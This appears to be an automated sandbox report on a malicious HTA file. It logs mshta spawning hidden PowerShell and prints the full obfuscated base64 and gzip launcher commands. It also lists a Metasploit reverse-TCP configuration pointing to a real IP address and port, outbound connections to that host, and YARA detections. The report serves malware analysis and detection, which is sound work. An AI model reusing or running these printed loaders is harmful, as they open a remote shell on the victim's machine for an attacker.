System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())), CommandLine: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: na.htaAvira: detected
          Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "86.104.74.31", "Port": 1911}
          Source: na.htaReversingLabs: Detection: 63%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
          Source: global trafficTCP traffic: 192.168.2.6:49711 -> 86.104.74.31:1911
          Source: Joe Sandbox ViewASN Name: TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: unknownTCP traffic detected without corresponding DNS query: 86.104.74.31
          Source: powershell.exe, 00000001.00000002.2187985444.00000000071F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.2181031208.0000000005234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary

          barindex
          Source: na.hta, type: SAMPLEMatched rule: Detects suspicious PowerShell script in combo with VBS or JS Author: Florian Roth
          Source: amsi32_4800.amsi.csv, type: OTHERMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
          Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
          Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 7110
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2260
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 7110Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2260Jump to behavior
          Source: na.hta, type: SAMPLEMatched rule: Susp_PowerShell_Sep17_2 date = 2017-09-30, hash1 = e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8, author = Florian Roth, description = Detects suspicious PowerShell script in combo with VBS or JS , reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: amsi32_4800.amsi.csv, type: OTHERMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
          Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
          Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTRMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.evad.winHTA@7/5@0/1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbf2cmnh.bsa.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: na.htaReversingLabs: Detection: 63%
          Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\na.hta"
